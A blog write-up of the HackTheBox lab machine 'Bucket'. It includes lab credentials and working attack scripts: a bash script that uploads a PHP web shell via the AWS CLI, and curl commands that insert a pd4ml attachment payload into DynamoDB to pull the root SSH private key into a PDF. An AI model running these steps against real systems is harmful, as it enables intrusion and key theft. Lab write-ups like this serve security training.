Hackthebox - Bucket | Shubham Kumar

Summary

Bucket,a Linux box created by HackTheBox user MrR3boot, was an overall medium difficulty box. Initial foothold was finding credentials in dynamo-db and using that to use that credentials on aws s3 cli. and then we upload a php shell and we get a shell as www-data and using another credential. we get roy(user). for Privilege Escalation we find another internal service running on 8000 and checking the code we see it is using pd4ml to convert an html to pdf. so we can inject and attach some files and download the result.pdf, using that we can download root .id_rsa with that we can ssh and we have pwned the box.

Enumeration

nmap

# Nmap 7.80 scan initiated Sun Oct 18 12:42:16 2020 as: nmap -sC -sV -oN nmap/bucket 10.10.10.212
Nmap scan report for 10.10.10.212
Host is up (0.093s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://bucket.htb/
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 18 12:42:28 2020 -- 1 IP address (1 host up) scanned in 12.41 seconds

Web

Checking the source we find another subdomain s3.bucket.htb

Lets add that to the /etc/hosts and view the page again.

running gobuster we find /shell on s3.bucket.htb

1 2	/health (Status: 200) /shell (Status: 200)

DynomoDB

following the tutorial and trying few things we can dump a users table which had some creds.

List tables

Describe Tables

Read Items

S3

So with those creds i used cloudadm creds with aws cli to ls file and we see we can upload too.

After updating the index.html we see that updating after few seconds on the main bucket.htb

So i wrote a script to upload a php shell and keep polling on bucket.htb to get a reverse shell

#!/bin/bash

export AWS_ACCESS_KEY_ID=Cloudadm
export AWS_SECRET_ACCESS_KEY=Welcome123!
echo "List Files."
aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver

## Copy file to Bucket

aws --endpoint-url http://s3.bucket.htb/ s3 cp ~/HackTheBox/machine/Bucket/www/shell.php s3://adserver/images/shell1.php

echo "Check if file is uploaded"
aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver

# Check if file exist
echo "Checking on s3.bucket"
# curl --write-out "%{http_code}\n" --silent --output /dev/null http://s3.bucket.htb/adserver/images/shell1.php
curl --write-out "%{http_code}\n" --silent --output /dev/null http://s3.bucket.htb/adserver/images/shell1.php
resp=404
while [[ $resp -eq 404 ]]; do
    resp=$(curl --write-out "%{http_code}\n" --silent --output /dev/null  http://bucket.htb/images/shell1.php)
    echo $resp
    sleep 0.1;
done

Note: You might have to run this few time to get the shell

which get me a shell as www-data

User

su roy with one of the password n2vM-<_K_Q:.Aa2 gave us user

Privilege Escalation

Checking /var/www/bucket-app/index.php

require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
        if($_POST["action"]==="get_alerts") {
                date_default_timezone_set('America/New_York');
                $client = new DynamoDbClient([
                        'profile' => 'default',
                        'region'  => 'us-east-1',
                        'version' => 'latest',
                        'endpoint' => 'http://localhost:4566'
                ]);

                $iterator = $client->getIterator('Scan', array(
                        'TableName' => 'alerts',
                        'FilterExpression' => "title = :title",
                        'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
                ));

                foreach ($iterator as $item) {
                        $name=rand(1,10000).'.html';
                        file_put_contents('files/'.$name,$item["data"]);
                }
                passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
        }
}

So I port-forward 8000 to my machine with

1	ssh -L 8000:127.0.0.1:8000 roy@10.10.10.212

and Checking pd4ml document to see if we can attach files.

var params = {
    TableName: 'alerts',
    KeySchema: [{ // Required HASH type attribute
        AttributeName: 'title',
        KeyType: 'HASH',
    }],
    AttributeDefinitions: [ // The names and types of all primary and index key attributes only
        {
            AttributeName: 'title',
            AttributeType: 'S',
        }
    ],
    ProvisionedThroughput: { // required provisioned throughput for the table
        ReadCapacityUnits: 5,
        WriteCapacityUnits: 5,
    }
};
dynamodb.createTable(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
    let insertData = {
        TableName: "alerts",
        Item: {
            "title": "Ransomware",
            "data": " <html>123<div style='text-align: right; width: 100%'><pd4ml:attachment description='desc' style='align: right' type='paperclip' src='/root/.ssh/id_rsa'/></div></html>",
        }
    };
    docClient.put(insertData, function(err, data) {
        if (err) ppJson(err); // an error occurred
        else ppJson(data); // successful response
    });
});

so I create a table and insert a row which contain a title as Ransomware and data as our payload. and we can do

1 2	curl -d "action=get_alerts" -X POST http://localhost:8000/index.php wget http://localhost:8000/files/result.pdf

And we get a pdf with root id_rsa in that file with that we can ssh to the box as root.

Extra:

I wrote a script to get the result.pdf

To use that we first port-forward using

1	ssh -L 8000:127.0.0.1:8000 roy@10.10.10.212

and then run this script

#!/bin/bash

# Create Table
curl -i -s -k -X $'POST' \
    -H $'Host: s3.bucket.htb' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Amz-User-Agent: aws-sdk-js/2.2.4' -H $'Content-Type: application/x-amz-json-1.0' -H $'X-Amz-Target: DynamoDB_20120810.CreateTable' -H $'Content-Length: 221' -H $'Origin: http://s3.bucket.htb' -H $'DNT: 1' -H $'Connection: close' -H $'Referer: http://s3.bucket.htb/shell/jsrepl/sandbox.js' \
    --data-binary $'{\"TableName\":\"alerts\",\"KeySchema\":[{\"AttributeName\":\"title\",\"KeyType\":\"HASH\"}],\"AttributeDefinitions\":[{\"AttributeName\":\"title\",\"AttributeType\":\"S\"}],\"ProvisionedThroughput\":{\"ReadCapacityUnits\":5,\"WriteCapacityUnits\":5}}' \
    $'http://s3.bucket.htb/'


# Insert in Alert with payload

curl -i -s -k -X $'POST' \
    -H $'Host: s3.bucket.htb' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Amz-User-Agent: aws-sdk-js/2.2.4' -H $'Content-Type: application/x-amz-json-1.0' -H $'X-Amz-Target: DynamoDB_20120810.PutItem' -H $'Content-Length: 241' -H $'Origin: http://s3.bucket.htb' -H $'DNT: 1' -H $'Connection: close' -H $'Referer: http://s3.bucket.htb/shell/jsrepl/sandbox.js' \
        --data-binary $'{\"TableName\":\"alerts\",\"Item\":{\"title\":{\"S\":\"Ransomware\"},\"data\":{\"S\":\" <html>123<div style=\'text-align: right; width: 100%\'><pd4ml:attachment description=\'desc\' style=\'align: right\' type=\'paperclip\' src=\'/root/.ssh/id_rsa\'/></div></html>\"}}}' \
        $'http://s3.bucket.htb/'

# Trigger
curl -d "action=get_alerts" -X POST http://localhost:8000/index.php

# Download
wget http://localhost:8000/files/result.pdf

and we have pwned Bucket 💃